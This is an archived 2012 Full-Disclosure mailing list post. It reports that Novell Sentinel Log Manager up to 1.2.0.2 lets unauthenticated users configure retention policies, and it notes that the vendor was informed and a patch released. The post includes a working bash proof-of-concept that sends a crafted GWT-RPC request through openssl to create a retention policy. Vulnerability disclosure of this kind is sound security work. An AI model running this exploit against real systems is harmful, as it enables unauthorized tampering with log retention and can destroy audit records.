lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 3 Oct 2012 09:53:18 +0200
From: Piotr Chmylkowski <piotr.chmylkowski@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Novell Sentinel Log Manager <= 1.2.0.2 retention
	policy vulnerability

Hello,

Novell Sentinel Log Manager ver. <=1.2.0.2 allows unauthenticated
users configuring retention policies.

Vendor informed: 2012/09/06
Patch Released: 2012/09/21
PoC:

#!/bin/bash

TARGET=$1
PORT=8443

if [ $# -ne 1 ]; then
  echo "Usage: `basename $0` target"
  exit 1
fi

echo "POST /novelllogmanager/datastorageservice.rpc HTTP/1.1
Host: $TARGET:$PORT
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Permutation: whatever
X-GWT-Module-Base:
https://$TARGET:$PORT/novelllogmanager/com.novell.siem.logmanager.LogManager/
Content-Length: 385
Cookie: JSESSIONID=whatever
Pragma: no-cache
Cache-Control: no-cache
Connection: close

5|0|9|https://$TARGET:$PORT/novelllogmanager/com.novell.siem.logmanager.LogManager/|E377321CAAD2FABED6283BD3643E4289|com.novell.sentinel.scout.client.datastorage.SentinelDataStorageService|createRetentionPolicy|com.novell.sentinel.scout.client.datastorage.retention.RetentionPolicy/419393389|sev:[0
TO 5]|1|AAA|java.util.ArrayList/3821976829|1|2|3|4|1|5|5|0|0|0|6|1|7|7|8|0|0|9|0|


" | openssl s_client -quiet -connect $TARGET:$PORT

Regards,
Piotr

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ